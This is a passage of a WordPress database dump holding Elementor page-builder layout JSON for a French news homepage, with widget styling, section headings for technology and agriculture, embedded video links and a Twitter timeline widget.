\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_line_height\":{\"unit\":\"em\",\"size\":1.3}},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2322,751,'_elementor_version','0.4'),(2323,751,'_elementor_css','a:3:{s:4:\"time\";i:1509369559;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2325,752,'_elementor_edit_mode','builder'),(2326,752,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\